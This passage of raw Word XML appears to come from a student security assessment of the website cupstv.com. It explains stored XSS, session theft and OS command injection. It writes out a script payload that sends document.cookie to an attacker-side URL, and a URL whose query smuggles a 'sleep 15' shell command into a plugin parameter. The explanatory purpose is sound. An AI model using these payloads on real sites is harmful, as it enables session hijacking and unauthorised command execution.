        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "0596514832", "abstract" : "1st ed. 1. Introduction -- 2. Installing Some Free Tools -- 3. Basic Observation -- 4. Web-Oriented Data Encoding -- 5. Tampering with Input -- 6. Automated Bulk Scanning -- 7. Automating Specific Tasks with cURL -- 8. Automating with LibWWWPerl -- 9. Seeking Design Flaws -- 10. Attacking AJAX -- 11. Manipulating Sessions -- 12. Multifaceted Tests.", "author" : [ { "dropping-particle" : "", "family" : "Hope", "given" : "Paco.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Walther", "given" : "Ben.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2008" ] ] }, "number-of-pages" : "285", "publisher" : "O'Reilly Media", "title" : "Web security testing cookbook", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=384f92d9-2c70-33b7-b3bf-e31796858309" ] } ], "mendeley" : { "formattedCitation" : "[14]", "plainTextFormattedCitation" : "[14]", "previouslyFormattedCitation" : "[14]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD" w:rsidRPr="00EA0BDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[14]</w:t>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="007D169E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D90824" w14:textId="77777777" w:rsidR="007D169E" w:rsidRDefault="007D169E" w:rsidP="00B00BAF"/>
    <w:p w14:paraId="391A5021" w14:textId="77777777" w:rsidR="00E177C3" w:rsidRDefault="007D169E" w:rsidP="00B00BAF">
      <w:r>
        <w:t>The second and more devastating version of cross site scripting is called a Stored or Persistent attack. This occurs when the data provided by the attacker is stored on the server and then shown to other users during regular browsing without proper HTML escaping. This is usually done through websites with message board. This could be a dating website for example, the dating website would hide user’s identities for privacy reasons. An attacker could also join this website and then design a script to run within other user’s browsers when they select the attackers profile</w:t>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "DOI" : "10.1007/978-3-540-70542-0_2", "author" : [ { "dropping-particle" : "", "family" : "Bisht", "given" : "Prithvi", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Venkatakrishnan", "given" : "V. N.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "container-title" : "Detection of Intrusions and Malware, and Vulnerability Assessment", "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2008" ] ] }, "page" : "23-43", "publisher" : "Springer Berlin Heidelberg", "publisher-place" : "Berlin, Heidelberg", "title" : "XSS-GUARD: Precise Dynamic Prevention of Cross-Site Scripting Attacks", "type" : "chapter" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=d20a9c00-4a6e-3aa4-907a-d8df036325c5" ] } ], "mendeley" : { "formattedCitation" : "[15]", "plainTextFormattedCitation" : "[15]", "previouslyFormattedCitation" : "[15]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD" w:rsidRPr="00EA0BDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[15]</w:t>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The script could send a message to the </w:t>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:t>attacker’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> own server to collect information.</w:t>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:t xml:space="preserve"> This could simply be done by updating the profile, by updating a section with genuine text but then add some HTML code at the end. The code will be hidden because it is enclosed inside a &lt;script&gt; element. If someone would then attempt to access the attacker’s profile the script would run automatically and then would attain the </w:t>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:t>user’s</w:t>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:t xml:space="preserve"> real identity. This form of cross site scripting is far more dangerous than the reflected version since there is no need to individually target victims by attempting to lure them to specific websites </w:t>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "0387743901", "abstract" : "Cover -- TOC Table of Contents -- CH 1.0 Wireless Security -- 1.1 Introduction -- 1.2 Wired Equivalent Privacy protocol -- 1.2.1 Analysis of WEP flaws -- 1.2.2 Key Stream Reuse -- 1.2.3 Message Modification -- 1.2.4 Message Injection -- 1.2.5 Authentication Spoofing -- 1.2.6 IP Redirection -- 1.2.7 Wireless Frame Generation -- 1.2.8 Encryption Cracking Tools -- 1.2.9 Retrieving the WEP keys from Client Host -- 1.2.10 Traffic Inection Tools -- 1.2.11 802.1x Cracking Tools -- 1.2.12 Wireless DoS Attacks -- 1.2.13 Attack against the 802.11i implementations -- 1.3 Prevention and Modifications -- 1.3.1 TKIP: temporal Key Integrity Protocol -- 1.3.2 AES -- CCMP -- 1.4 Prevention Method using Detection Devices -- 1.5 Conclusion -- CH 2.0 Vulnerability Analysis for Mail Protocols -- 2.1 Introduction -- 2.2 Format String Specifiers -- 2.2.1 Format String Vulnerability -- 2.2.1.1 Format String Denial of Service Attack -- 2.2.1.2 Format String Vulnerability Reading Attack -- 2.2.1.3 Format String Vulnerability Writing Attack -- 2.2.1.4 Preventive Measures for Format String vulnerability -- 2.3 Buffer Overflow Attack -- 2.3.1 Buffer Overflow Prevention -- 2.4 Directory Traversal Attacks -- 2.4.1 Remote Detection -- 2.5 False Positive in Remote Detection for Mail Traffic -- 2.5.1 False Positive in case of SMTP Traffic -- 2.5.2 False Positive in case of IMAP Traffic -- 2.6 Conclusion -- CH 3.0 Vulnerability Analysis for FTP and TFTP -- 3.1 Introduction -- 3.1.1 Buffer Overflow in FTP -- 3.1.2 Directory Traversal Attack in FTP -- 3.2 TFTP Vulnerability Analysis -- 3.2.1 Vulnerability Analysis -- 3.3 Conclusion -- CH 4.0 Vulnerability Analysis for HTTP -- 4.1 Introduction -- 4.2 XSS Attack -- 4.2.1 Prevention against Cross Site Scripting Attacks -- 4.3 SQL Injection Attacks -- 4.3.1 SQL Injection Case Study -- 4.3.2 Preventive Measures -- 4.3.3 Other Preventive Measures -- 4.4 MS DoS Device Name Vulnerability -- 4.4.1 Prevention from DoS Device Name Vulnerability -- 4.5 False Positive in HTTP -- 4.6 Evasion of HTTP Signatures -- 4.7 Conclusion -- CH 5.0 Vulnerability Analysis for DNS and DHCP -- 5.1 Introduction of DNS Protocol -- 5.1.1 Vulnerabilities in a DNS Protocol -- 5.1.2 False Positives in a DNS Protocol -- 5.2 Introduction of DHCP -- 5.2.1 Vulnerabilities in DHCP -- 5.2.2 False Positive in DHCP -- 5.3 Conclusion -- CH 6.0 Vulnerability Analysis for LDAP and SNMP -- 6.1 Introduction -- 6.2 ASN and BER Encoding -- 6.3 BER implementation for LDAP -- 6.3.1 Threat \u2026", "author" : [ { "dropping-particle" : "", "family" : "Singh", "given" : "Abhishek", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Singh", "given" : "Baibhav.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Joseph", "given" : "Hirosh.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2008" ] ] }, "number-of-pages" : "254", "publisher" : "Springer", "title" : "Vulnerability analysis and defense for the Internet", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=385dd0e8-f392-3032-a9aa-4507dae6d2a4" ] } ], "mendeley" : { "formattedCitation" : "[16]", "plainTextFormattedCitation" : "[16]", "previouslyFormattedCitation" : "[16]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD" w:rsidRPr="00EA0BDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[16]</w:t>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "0596554478", "abstract" : "5th ed. A guide for experienced programmers demonstrates the core JavaScript language, offers examples of common tasks, and contains an extensive reference to JavaScript commands, objects, methods, and properties. Introduction to JavaScript -- Lexical structure -- Datatypes and values -- Variables -- Expressions and operators -- Statements -- Objects and arrays -- Functions -- Classes, constructors, and prototypes -- Modules and namespaces -- Pattern matching with regular expressions -- Scripting Java -- JavaScript in Web browsers -- Scripting browser Windows -- Scripting documents -- Cascading style sheets and Dynamic HTML -- Events and event handling -- Forms and form elements -- Cookies and client-side persistence -- Scripting HTTP -- JavaScript and XML -- Scripted client-side graphics -- Scripting Java Applets and Flash movies -- Core JavaScript reference -- Client-side JavaScript reference.", "author" : [ { "dropping-particle" : "", "family" : "Flanagan", "given" : "David.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2006" ] ] }, "number-of-pages" : "994", "publisher" : "O'Reilly", "title" : "JavaScript : the definitive guide", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=91ef6dec-4be0-35ea-b0a0-d59a86b5c032" ] } ], "mendeley" : { "formattedCitation" : "[17]", "plainTextFormattedCitation" : "[17]", "previouslyFormattedCitation" : "[17]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD" w:rsidRPr="00EA0BDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[17]</w:t>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00333753">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E177C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF4FD8">
        <w:t>This could be potentially possible on cupstv.com since during the scans within section 4.3 is was shown that XSS protection was disabled on multiple sections of the website, this is something that cross site scripting can exploit if done correctly and there are no other forms of protection in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180CFFD" w14:textId="77777777" w:rsidR="00E177C3" w:rsidRDefault="00E177C3" w:rsidP="00B00BAF"/>
    <w:p w14:paraId="05B7FA20" w14:textId="77777777" w:rsidR="00F05BE8" w:rsidRDefault="001C3504" w:rsidP="00B00BAF">
      <w:r>
        <w:t>The scan from section 4.3 also picked up another issue where session stealing is possible, this can be done by using a cross site script. If a piece of malicious script is input onto a webpage, perhaps a comments section within cupstv.com</w:t>
      </w:r>
      <w:r w:rsidR="004236EA">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E177C3">
        <w:t xml:space="preserve"> An attacker could plant a script on the webpage which links them to an image that looks as though it is from cupstv.com but is in fact stored on an attacker’s server.</w:t>
      </w:r>
      <w:r w:rsidR="004236EA">
        <w:t xml:space="preserve"> If for example an attacker would comment &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004236EA">
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004236EA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004236EA">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004236EA">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004236EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004236EA">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004236EA">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="004236EA" w:rsidRPr="004236EA">
        <w:t>http://cupstv.com.php?cookies=’ + escape(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004236EA" w:rsidRPr="004236EA">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004236EA" w:rsidRPr="004236EA">
        <w:t>) + ‘</w:t>
      </w:r>
      <w:r w:rsidR="004236EA">
        <w:t xml:space="preserve"> /&gt; ‘); &lt;/script&gt;, script section tells the webserver that this is a script to be run and not standard HTML. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004236EA">
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004236EA">
        <w:t xml:space="preserve"> states to dump this script </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004236EA">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00E177C3">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E177C3">
        <w:t xml:space="preserve"> comments section </w:t>
      </w:r>
      <w:r w:rsidR="004236EA">
        <w:t xml:space="preserve">as a form of text. This will then output valid HTML on the webpage, </w:t>
      </w:r>
      <w:r w:rsidR="00E177C3">
        <w:t>the HTML tells the users browser that they need to access to that image to complete the webpage. This will then trick the user’s browser into sending the attacker their cookie to access the image and carry on the session</w:t>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "0203490045", "abstract" : "1. Introduction: The Chess Game -- pt. I. Foundation Material -- 2. Case Study in Subversion -- 3. Know Your Opponent -- 4. Anatomy of an Attack -- 5. Your Defensive Arsenal -- 6. Programming -- 7. IP and Layer 2 Protocols -- 8. The Protocols -- pt. II. System and Network Penetration -- 9. Domain Name System (DNS) -- 10. Directory Services -- 11. Simple Mail Transfer Protocol (SMTP) -- 12. Hypertext Transfer Protocol (HTTP) -- 13. Database Hacking and Security -- 14. Malware and Viruses -- 15. Network Hardware -- pt. III. Consolidation -- 16. Consolidating Gains -- 17. After the Fall -- 18. Conclusion.", "author" : [ { "dropping-particle" : "", "family" : "Young", "given" : "Susan (Susan Elizabeth)", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Aitel", "given" : "Dave.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2004" ] ] }, "publisher" : "CRC Press", "title" : "The hacker's handbook : the strategy behind breaking into and defending networks", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=2094d2f1-00a0-31ef-839b-2687b9eb1cfb" ] } ], "mendeley" : { "formattedCitation" : "[18]", "plainTextFormattedCitation" : "[18]", "previouslyFormattedCitation" : "[18]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B73058" w:rsidRPr="00B73058">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[18]</w:t>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "0203325435", "abstract" : "5th ed.", "author" : [ { "dropping-particle" : "", "family" : "Tipton", "given" : "Harold F.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Krause", "given" : "Micki.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2006" ] ] }, "publisher" : "Taylor &amp; Francis e-Library", "title" : "Information security management handbook", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=9b9f078d-45f6-37e4-9c5b-822666d68a3a" ] } ], "mendeley" : { "formattedCitation" : "[19]", "plainTextFormattedCitation" : "[19]", "previouslyFormattedCitation" : "[19]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B73058" w:rsidRPr="00B73058">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[19]</w:t>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00E177C3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E034F99" w14:textId="77777777" w:rsidR="00AF0EDF" w:rsidRDefault="00AF0EDF" w:rsidP="00B00BAF"/>
    <w:p w14:paraId="6011A6B4" w14:textId="77777777" w:rsidR="00F05BE8" w:rsidRDefault="00F05BE8" w:rsidP="00F05BE8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc501124791"/>
      <w:r w:rsidRPr="00F05BE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Remote OS Command Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="203526A0" w14:textId="77777777" w:rsidR="00F05BE8" w:rsidRDefault="00F05BE8" w:rsidP="00F05BE8"/>
    <w:p w14:paraId="32179CCC" w14:textId="77777777" w:rsidR="00F05BE8" w:rsidRDefault="00F05BE8" w:rsidP="00F05BE8">
      <w:r>
        <w:t xml:space="preserve">Remote OS Command Injection was picked up as a </w:t>
      </w:r>
      <w:r w:rsidR="00B1698A">
        <w:t>high-risk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flaw within section 4.3 of this report. The attack technique is used for </w:t>
      </w:r>
      <w:r w:rsidR="00E64AC5">
        <w:t xml:space="preserve">unauthorized execution of operation system commands. The attack is only possible if an application accepts untrusted input to build operating system commands in an insecure manner which involved improper data sanitization </w:t>
      </w:r>
      <w:r w:rsidR="00E64AC5" w:rsidRPr="00E64AC5">
        <w:t>or improper calling of external programs</w:t>
      </w:r>
      <w:r w:rsidR="00E64AC5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B1698A">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "0596519338", "abstract" : "2nd ed. How secure is your network? The best way to find out is to attack it. Network Security Assessment provides you with the tricks and tools professional security consultants use to identify and assess risks in Internet-based networks-the same penetration testing model they use to secure government, military, and commercial networks. With this book, you can adopt, refine, and reuse this testing model to design and deploy networks that are hardened and immune from attack. Network Security Assessment demonstrates how a determined attacker scours Internet-based netw. Table of Contents; Foreword; About Bob Ayers; Preface; Overview; Recognized Assessment Standards; NSA IAM; CESG CHECK; PCI Data Security Standards; Other Assessment Standards and Associations; Hacking Defined; Organization; Audience; Mirror Site for Tools Mentioned in This Book; Using Code Examples; Conventions Used in This Book; Comments and Questions; Acknowledgments; Guest Authors Featured in This Book; Network Security Assessment; The Business Benefits; IP: The Foundation of the Internet; Classifying Internet-Based Attackers; Assessment Service Definitions. Network Security Assessment MethodologyInternet Host and Network Enumeration; Bulk Network Scanning and Probing; Investigation of Vulnerabilities; Exploitation of Vulnerabilities; The Cyclic Assessment Approach; Network Security Assessment Platform; Virtualization Software; VMware; Microsoft Virtual PC; Parallels; Operating Systems; Microsoft Windows Platforms; Linux Platforms; Apple Mac OS X; Reconnaissance Tools; Network Scanning Tools; Nmap; Nessus; Commercial Network Scanning Tools; Exploitation Frameworks; Metasploit Framework; Commercial Exploitation Frameworks. Web Application Testing ToolsCommercial Web Application Scanning Tools; Internet Host and Network Enumeration; Querying Web and Newsgroup Search Engines; Google Search Functionality; Enumerating contact details with Google; Effective search query strings; Searching Newsgroups; Querying Netcraft; Querying Domain WHOIS Registrars; Using the Unix whois utility; Querying IP WHOIS Registrars; IP WHOIS Querying Tools and Examples; Querying WHOIS databases to enumerate objects for a given company; Using WHOIS web search engines; Harvesting user details through WHOIS. Enumerating WHOIS maintainer objectsBGP Querying; DNS Querying; Forward DNS Querying; Forward DNS querying through nslookup; DNS Zone Transfer Techniques; Checking for DNS zone transfer weaknesses using host; Usi\u2026", "author" : [ { "dropping-particle" : "", "family" : "McNab", "given" : "Chris (Chris R.)", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2008" ] ] }, "number-of-pages" : "478", "publisher" : "O'Reilly Media, Inc", "title" : "Network security assessment", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=8053812f-ccca-36d5-bde4-53b4d38cf479" ] } ], "mendeley" : { "formattedCitation" : "[20]", "plainTextFormattedCitation" : "[20]", "previouslyFormattedCitation" : "[20]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00B1698A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B73058" w:rsidRPr="00B73058">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[20]</w:t>
      </w:r>
      <w:r w:rsidR="00B1698A">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B1698A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B1698A">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "1786469685", "abstract" : "Master the art of detecting and averting advanced network security attacks and techniquesAbout This Book* Deep dive into the advanced network security attacks and techniques by leveraging tools such as Kali Linux 2, MetaSploit, Nmap, and Wireshark* Become an expert in cracking WiFi passwords, penetrating anti-virus networks, sniffing the network, and USB hacks* This step-by-step guide shows you how to confidently and quickly detect vulnerabilities for your network before the hacker doesWho This Book Is ForThis book is for network security professionals, cyber security professionals, and Pentesters who are well versed with fundamentals of network security and now want to master it. So whether you're a cyber security professional, hobbyist, business manager, or student aspiring to becoming an ethical hacker or just want to learn more about the cyber security aspect of the IT industry, then this book is definitely for you.What You Will Learn* Use SET to clone webpages including the login page* Understand the concept of Wi-Fi cracking and use PCAP file to obtain passwords* Attack using a USB as payload injector* Familiarize yourself with the process of trojan attacks* Use Shodan to identify honeypots, rogue access points, vulnerable webcams, and other exploits found in the database* Explore various tools for wireless penetration testing and auditing* Create an evil twin to intercept network traffic* Identify human patterns in networks attacksIn DetailComputer networks are increasing at an exponential rate and the most challenging factor organisations are currently facing is network security. Breaching a network is not considered an ingenious effort anymore, so it is very important to gain expertise in securing your network.The book begins by showing you how to identify malicious network behaviour and improve your wireless security. We will teach you what network sniffing is, the various tools associated with it, and how to scan for vulnerable wireless networks. Then we'll show you how attackers hide the payloads and bypass the victim's antivirus.Furthermore, we'll teach you how to spoof IP / MAC address and perform an SQL injection attack and prevent it on your website. We will create an evil twin and demonstrate how to intercept network traffic. Later, you will get familiar with Shodan and Intrusion Detection and will explore the features and tools associated with it. Toward the end, we cover tools such as Yardstick, Ubertooth, Wifi Pineapple, and Alfa use\u2026", "author" : [ { "dropping-particle" : "", "family" : "Salmon", "given" : "Arthur.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2017" ] ] }, "publisher" : "Packt Publishing", "title" : "Applied Network Security.", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=cf3e6e0d-696a-3959-bd01-f10092e3db96" ] } ], "mendeley" : { "formattedCitation" : "[21]", "plainTextFormattedCitation" : "[21]", "previouslyFormattedCitation" : "[21]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00B1698A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B73058" w:rsidRPr="00B73058">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[21]</w:t>
      </w:r>
      <w:r w:rsidR="00B1698A">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00E64AC5" w:rsidRPr="00E64AC5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B1698A">
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidR="00412AE7">
        <w:t xml:space="preserve">he ZAP which was used on cupstv.com has found several issues that can be exploited, an example of this is using the web address </w:t>
      </w:r>
      <w:r w:rsidR="00A446EC" w:rsidRPr="00A446EC">
        <w:t>http://cupstv.com/wp-content/plugins/wunderground/assets/js/widget.min.js</w:t>
      </w:r>
      <w:r w:rsidR="00A446EC" w:rsidRPr="00A446EC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>?query=query%22%3Bsleep+15%3B%22 HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidR="00412AE7" w:rsidRPr="00412AE7">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00412AE7" w:rsidRPr="00412AE7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00412AE7">
        <w:t xml:space="preserve">the injected code can be shown highlighted in red. This command </w:t>
      </w:r>
      <w:r w:rsidR="00A446EC">
        <w:t>was run during the ZAP scan, ZAP received the following reply;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE6FB53" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00F05BE8"/>
    <w:p w14:paraId="0E44885B" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRPr="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00A446EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762FBF6E" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRPr="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00A446EC">
      <w:pPr>
